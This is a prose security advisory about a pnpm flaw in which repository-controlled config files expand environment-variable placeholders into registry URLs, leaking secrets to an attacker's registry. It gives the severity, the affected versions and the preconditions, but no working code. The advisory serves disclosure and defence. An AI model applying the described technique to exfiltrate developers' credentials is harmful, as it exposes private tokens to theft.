pnpm, a popular JavaScript package manager, had a flaw in versions prior to 10.34.2 and 11.5.3 that allowed repository‑controlled configuration files (.npmrc and pnpm-workspace.yaml) to expand environment variable placeholders (${ENV_VAR}) straight into registry URLs and credentials. A repository owner could therefore embed the victim's environment secrets in a registry request and send them to an attacker‑chosen registry before any lifecycle scripts executed. This results in disclosure of potentially sensitive information, such as private tokens or credentials, making the vulnerability a medium‑severity information‑exposure flaw (CWE‑200, CWE‑201, CWE‑522).

Systems running pnpm versions earlier than 10.34.2 or 11.5.3 are affected. The flaw exists in the pnpm package manager maintained by the pnpm:pnpm project. Users of any pnpm‑controlled workspace that includes a .npmrc or pnpm‑workspace.yaml file that contains environment variable placeholders are potentially vulnerable unless the configuration is sanitized or the package manager is upgraded to the patched release.

The CVSS base score of 6.5 indicates moderate severity, and there is no EPSS score available; the vulnerability is not listed in CISA’s KEV catalog. Exploitation requires an attacker who can influence the repository’s configuration files, such as by hosting a malicious package or modifying a shared pnpm‑workspace.yaml. Because the environment variables are expanded before script execution, an attacker can intercept secrets during the dependency resolution phase. The risk is primarily that of covert data exfiltration rather than direct code execution, but given the potential for leaking credentials, the threat is significant for environments where sensitive secrets are used in .npmrc files.